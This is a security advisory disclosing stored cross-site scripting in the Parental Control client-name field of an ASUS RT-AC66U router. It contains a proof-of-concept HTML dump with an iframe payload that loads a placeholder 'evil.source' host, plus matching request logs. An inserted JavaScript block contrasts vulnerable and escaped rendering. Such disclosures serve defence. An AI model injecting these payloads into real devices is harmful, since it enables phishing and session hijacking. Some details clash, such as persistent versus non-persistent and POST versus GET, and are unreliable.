Document Title:
===============
ASUS WRT-AC66U 3.x - Cross Site Scripting Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=1993


Release Date:
=============
2018-06-27


Vulnerability Laboratory ID (VL-ID):
====================================
1993


Common Vulnerability Scoring System:
====================================
3


Vulnerability Class:
====================
Cross Site Scripting - Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
802.11ac Dual-Band Wireless-AC1750 Gigabit Router. RT-AC66U supports several operation modes to meet different requirements. Please select the mode that matches your situation. Wireless router mode (Default), Access Point (AP) mode or Media bridge. In wireless router / IP sharing mode, RT-AC66U connects to the Internet via PPPoE, DHCP, PPTP, L2TP, or Static IP and shares the wireless network to LAN clients or devices. In this mode, NAT, firewall, and DHCP server are enabled by default. UPnP and Dynamic DNS are supported for SOHO and home users. Select this mode if you are a first-time user or you are not currently using any wired/wireless routers.

The ASUS RT-AC66U is a 5th gen dual-band Wi-Fi router, and the launch platform for the new ASUS AiCloud service. Its speed reaches 1.75Gbps, utilizing the Broadcom 802.11ac Wi-Fi controller and working in 2.4GHz and 5GHz. The 5GHz band supports up to 1.3Gbps, exceeding current Gigabit wired transmission and 3X faster than 802.11n. The RT-AC66U offers smooth lag-resistant multitasking and super-fast streaming, while ASUS AiRadar intelligently strengthens wireless connections via powerful amplification, offering future-proof optimized performance.
(Copy of the Homepage: https://www.asus.com/Networking/RTAC66U/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple cross site scripting vulnerabilities in the official ASUS Wireless Router RT Firmware v3.0.0.4.372_67.


Vulnerability Disclosure Timeline:
==================================
2018-06-27: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
ASUS
Product: WRT - Wireless Router (UI) 3.0.0.4.372_67


Exploitation Technique:
=======================
Local


Severity Level:
===============
Medium


Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Independent Security Research


Technical Details & Description:
================================
A cross site scripting vulnerability has been discovered in the ASUS Wireless Router RT Firmware v3.0.0.4.372_67.
The cross site scripting web vulnerability allows remote attackers to inject their own malicious script code on the application side of the vulnerable function or service module.

The cross site scripting vulnerability is located in the `Client Name` input field of the `Parental Control` module. The client name input field is not securely parsed, which allows an attacker to manipulate the client list on the index of the module. The request method to inject is POST and the attack vector is located on the application side. Because no cookies are reachable in the panel UI, low privileged user accounts are only able to redirect or inject malware on the client side for execution. The context is first saved client-side; after the apply function is used, it is saved permanently to the image db.
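The unsafe handling described above, shown as an added example that is not code from the ASUS firmware or from the advisory: the pattern of writing a stored client name straight into the table row markup (which is how a name containing markup ends up live in the client list, as row1 of the PoC below shows), beside a hardened version that encodes every untrusted value for the HTML context it lands in and validates the rule before it is saved. The field names PC_devicename and PC_mac, the 32-character limit and the is_hwaddr check are taken from the form in the PoC; the rendering functions, the DEVICE_NAME_RE allow-list and the sample rules are assumptions for illustration.

```javascript
// Added example, not ASUS code: contrasts unsafe and hardened rendering of the
// Parental Control client list, plus server-side validation of a rule before it is
// stored. Field names and limits follow the form in the advisory; everything else
// (function names, DEVICE_NAME_RE, the sample rules) is assumed for illustration.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode a value so it is inert both as text content and inside a double-quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Same shape the form's client-side is_hwaddr() enforces, applied again where the rule is saved.
const MAC_RE = /^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$/;
function isHwaddr(mac) {
  return MAC_RE.test(mac);
}

// Allow-list for the client name: hostname-like characters, 1 to 32 long.
// The form's maxlength="32" is only a browser hint and does not constrain a crafted POST.
const DEVICE_NAME_RE = /^[A-Za-z0-9 _.-]{1,32}$/;
function isValidDeviceName(name) {
  return DEVICE_NAME_RE.test(name);
}

// Vulnerable pattern: the stored name is concatenated straight into the row markup.
function renderClientRowVulnerable(index, name, mac) {
  return `<tr id="row${index}"><td title="${name}">${name}</td>` +
         `<td title="${mac}">${mac}</td></tr>`;
}

// Hardened pattern: every untrusted value is encoded before it reaches the markup.
function renderClientRowSafe(index, name, mac) {
  const n = escapeHtml(name);
  const m = escapeHtml(mac);
  return `<tr id="row${index}"><td title="${n}">${n}</td>` +
         `<td title="${m}">${m}</td></tr>`;
}

// Validate one rule before persisting it; returns the names of the rejected fields.
function validateClientRule(rule) {
  const errors = [];
  if (!isValidDeviceName(rule.PC_devicename)) errors.push('PC_devicename');
  if (!isHwaddr(rule.PC_mac)) errors.push('PC_mac');
  return errors;
}

// Constructed sample rules: one benign entry taken from the PoC client list and one
// carrying the markup payload shown in the PoC's row1.
const INJECTED_NAME = '"<iframe src="evil.source">';
const SAMPLE_RULES = [
  { PC_devicename: 'JIEMING-NB', PC_mac: '50:E5:49:A2:00:F8' },
  { PC_devicename: INJECTED_NAME, PC_mac: 'aa:aa:aa:aa:aa:aa' },
];

// Render both variants for each sample rule alongside the validation verdict.
function demo() {
  return SAMPLE_RULES.map((r, i) => ({
    errors: validateClientRule(r),
    vulnerable: renderClientRowVulnerable(i, r.PC_devicename, r.PC_mac),
    safe: renderClientRowSafe(i, r.PC_devicename, r.PC_mac),
  }));
}

if (typeof module !== 'undefined' && typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Running the block with node shows the second rule rejected on PC_devicename, the vulnerable row carrying a live `<iframe>` tag and the safe row carrying only `&lt;iframe ...&gt;`. The point is that the maxlength attribute and the onkeypress filter in the form only constrain a cooperating browser; the same allow-list has to be applied where the rule is stored, and every client name has to be encoded when the list is rendered.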
The security risk of the client-side cross site scripting web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0. Exploitation of the client-side web vulnerability requires a privileged web-application user account and low user interaction. Successful exploitation of the vulnerability results in non-persistent phishing, session hijacking, non-persistent external redirect to malicious sources and client-side manipulation of affected or connected web module context.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Parental Control

Vulnerable Parameter(s):
[+] Client Name


Proof of Concept (PoC):
=======================
The cross site scripting vulnerability can be exploited by remote attackers with a privileged user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Exploitation
<tbody><tr><th title="Select all" width="5%" height="30px"><input id="selAll" onclick="selectAll(this, 0);" value="" type="checkbox"></th><th width="40%">Clients Name</th><th width="25%">Clients MAC Address</th><th width="10%"> Time Management</th><th width="10%">Add / Delete</th></tr>
<tr><td style="border-bottom:2px solid #000;" title="Enable/Disable"><input id="newrule_Enable" checked="" type="checkbox"></td>
<td style="border-bottom:2px solid #000;"> <input maxlength="32" style="margin-left:10px;float:left;width:255px;" class="input_20_table" name="PC_devicename" onkeypress="" onclick="hideClients_Block();" onblur="if(!over_var){hideClients_Block();}" type="text"><img id="pull_arrow" src="images/arrow-down.gif" onclick="pullLANIPList(this);" title="Select the device name of DHCP clients." onmouseover="over_var=1;" onmouseout="over_var=0;" height="14px;">
<div id="ClientList_Block_PC" class="ClientList_Block_PC">
<a><div onmouseover="over_var=1;" onmouseout="over_var=0;" onclick="setClientIP('JIEMING-NB', '50:E5:49:A2:00:F8');"> <strong>192.168.1.166</strong> ( JIEMING-NB) </div></a>
<a><div onmouseover="over_var=1;" onmouseout="over_var=0;" onclick="setClientIP('JIEMING-MACBOOK', '98:4B:E1:CB:DA:D6');"><strong>192.168.1.188</strong> ( JIEMING-MACBOOK) </div></a>
<a><div onmouseover="over_var=1;" onmouseout="over_var=0;" onclick="setClientIP('JIEMING-PC', 'A8:26:D9:31:2B:49');"> <strong>192.168.1.161</strong> ( JIEMING-PC) </div></a>
<a><div onmouseover="over_var=1;" onmouseout="over_var=0;" onclick="setClientIP('A8:26:D9:31:2B:49', 'A8:26:D9:31:2B:49');"><strong>192.168.1.210</strong> </div></a>
<!--[if lte IE 6.5]><iframe class="hackiframe2"></iframe><![endif]--></div></td>
<td style="border-bottom:2px solid #000;"> <input maxlength="17" class="input_macaddr_table" name="PC_mac" onkeypress="return is_hwaddr(this,event)" type="text"></td>
<td style="border-bottom:2px solid #000;">--</td>
<td style="border-bottom:2px solid #000;"> <input class="url_btn" onclick="addRow_main(16)" value="" type="button"></td></tr>
<tr id="row0"><td title="1"> <input onclick="genEnableArray_main(0,this);" checked="" type="checkbox"></td><td title=""></td> <td title="aa:aa:aa:aa:aa:aa">aa:aa:aa:aa:aa:aa</td><td><input class="service_btn" onclick="gen_lantowanTable(0);" value="" type="button"></td><td><input class="remove_btn" onclick="deleteRow_main(this);" value="" type="button"></td></tr>
<tr id="row1"><td title="undefined"><input onclick="genEnableArray_main(1,this);" type="checkbox"></td> <td title="" <iframe="" src="evil.source"">"<iframe src="evil.source</td"><td title="undefined">undefined</td> <td><input class="service_btn" type="button" onclick="gen_lantowanTable(1);" value=""/></td><td><input class="remove_btn" type="button" onclick="deleteRow_main(this);" value=""/></td>
<tr id="row2"><td title="undefined"> <input type="checkbox" onclick="genEnableArray_main(2,this);" /></td><td title=""></td><td title="undefined">undefined</td> <td><input class="service_btn" type="button" onclick="gen_lantowanTable(2);" value=""/></td><td> <input class="remove_btn" type="button" onclick="deleteRow_main(this);" value=""/> </td></tr></table></iframe></td></tr></tbody>


--- PoC Session Logs [GET] ---
Status: 304[Not Modified]
GET http://event.localhost/nw/_ui/en/ParentalControl.html
Mime Type[text/html]
   Request Header:
      Host[event.localhost]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Referer[http://event.localhost/nw/_ui/en/Advanced_System_Content.html]
      Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
      If-Modified-Since[Thu, 20 Jun 2013 05:45:19 GMT]
      If-None-Match["31793159796dce1:0"]
      Cache-Control[max-age=0]
   Response Header:
      Content-Type[text/html]
      Last-Modified[Thu, 20 Jun 2013 05:45:19 GMT]
      Etag["31793159796dce1:0"]
      Connection[keep-alive]
-
Status: 200[OK]
GET http://event.localhost/nw/_ui/en/evil.source%3C/td
Mime Type[text/html]
   Request Header:
      Host[event.localhost]
      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Referer[http://event.localhost/nw/_ui/en/ParentalControl.html]
      Cookie[dm_install=yes; dm_enable=yes; hwaddr=74:D0:2B:64:F0:B0]
      Connection[keep-alive]
      Upgrade-Insecure-Requests[1]
   Response Header:
      Content-Type[text/html]
      Server[Microsoft-IIS/7.5]
      X-Powered-By[ASP.NET]
      Content-Length[1245]
      Connection[keep-alive]


Reference(s):
http://event.localhost/
http://event.localhost/nw/
http://event.localhost/nw/_ui/


Solution - Fix & Patch:
=======================
The issue was reported in 2016 Q4 (2016-11-09) and was finally resolved in 2017 Q3 - Q4 by the ASUS WRT developer team. The public disclosure process took about 10 months.


Security Risk:
==============
The security risk of the persistent cross site scripting web vulnerability in the ASUS WRT UI is estimated as medium (CVSS 3.0).


Credits & Authors:
==================
Lawrence Amer (Vulnerability Lab Core Research Team) [zeroattck@xxxxxxxxx] - https://www.vulnerability-lab.com/show.php?user=Lawrence+Amer


Disclaimer & Information:
=========================
The information provided in this advisory is provided as is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.
Domains:    www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social:     twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partial usage, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material, contact (admin@) to ask for permission.

Copyright © 2018 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com